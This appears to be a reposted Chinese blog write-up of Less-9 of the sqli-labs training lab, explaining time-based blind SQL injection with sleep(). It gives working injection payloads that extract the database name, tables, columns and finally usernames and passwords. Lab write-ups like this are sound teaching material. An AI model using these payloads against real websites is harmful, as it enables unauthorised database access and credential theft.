当前位置: 代码迷 >> 综合 >> sqli-labs 9
  详细解决方案

sqli-labs 9

热度:21   发布时间:2023-11-30 10:49:21.0

less -9

很快啊,我们来到了第9题
掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数
所以也叫延时注入

在这里插入图片描述
我们惊讶的发现原本应该报错的?id=1’都是这样的回显
尝试了很多只会回显
显然这题使得布尔型盲注都无法使用
所以我们使用延时注入来判断语句的对错
?id=1’ and sleep(5) --+
我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒
由于我们的1’成功闭合前面–+又注释了后面
而and连接了前面正确的语句所以执行了后面的sleep()函数
所以导致了页面大概等待了5秒的时间
而如果前面的语句闭合错误,那么后面的sleep()函数就将不会被执行
所以如果你的页面响应等待了很久那么恭喜你
你成功闭合了前面
接下来的注入参考sqli-lab 8
爆库名
?id=1’ and (ascii(substr(database(),1,1))=115) and sleep(5) --+
(老规矩,嫌麻烦可以用burp或者sqlmap)
爆表名
?id=1’ and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=101) and sleep(5) --+
爆字段名
?id=1’ and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>97) and sleep(5) --+
爆内容
?id=1’ and (ascii(substr((select group_concat(username,’ ',password) from users limit 0,1),1,1))=68)
and sleep(5) --+

  相关解决方案